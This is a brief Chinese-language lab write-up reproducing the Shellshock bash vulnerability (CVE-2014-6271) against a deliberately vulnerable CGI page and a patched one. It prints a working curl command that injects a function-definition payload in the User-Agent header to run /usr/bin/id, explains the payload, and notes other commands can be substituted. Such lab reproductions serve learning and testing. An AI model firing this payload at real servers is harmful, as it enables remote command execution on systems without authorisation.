CVE-2014-6271 Bash破殼漏洞Shellshock (復現)
服務啟動后,通過瀏覽器或命令行訪問以下兩個頁面,確認服務已正常運行:
存在漏洞的頁面(基于 bash4.3):http://your-ip:8080/victim.cgi
修復后的頁面(基于最新版 bash):http://your-ip:8080/safe.cgi

執行curl -H "User-Agent: () { foo; }; echo Content-Type: text/plain; echo; /usr/bin/id" http://192.168.75.132:8080/victim.cgi命令
發送 HTTP 請求,在User-Agent頭中注入 Payload

Payload 說明:
() { foo; }; 是為了繞過 bash 的函數定義檢查,后面的echo Content-Type: text/plain; echo; /usr/bin/id會被漏洞 bash 執行,其中:
echo Content-Type: text/plain; echo; 用于正確輸出 HTTP 響應頭
/usr/bin/id 是要執行的系統命令(可替換為其他命令,如/bin/ls等)
觀察結果
訪問victim.cgi時,命令會被成功執行,返回id命令的結果(如用戶 UID、GID 等信息),說明漏洞存在。
訪問safe.cgi時,相同的 Payload 不會被執行,只會返回正常頁面內容,說明修復有效
這里返回id命令,漏洞利用成功!

浙公網安備 33010602011771號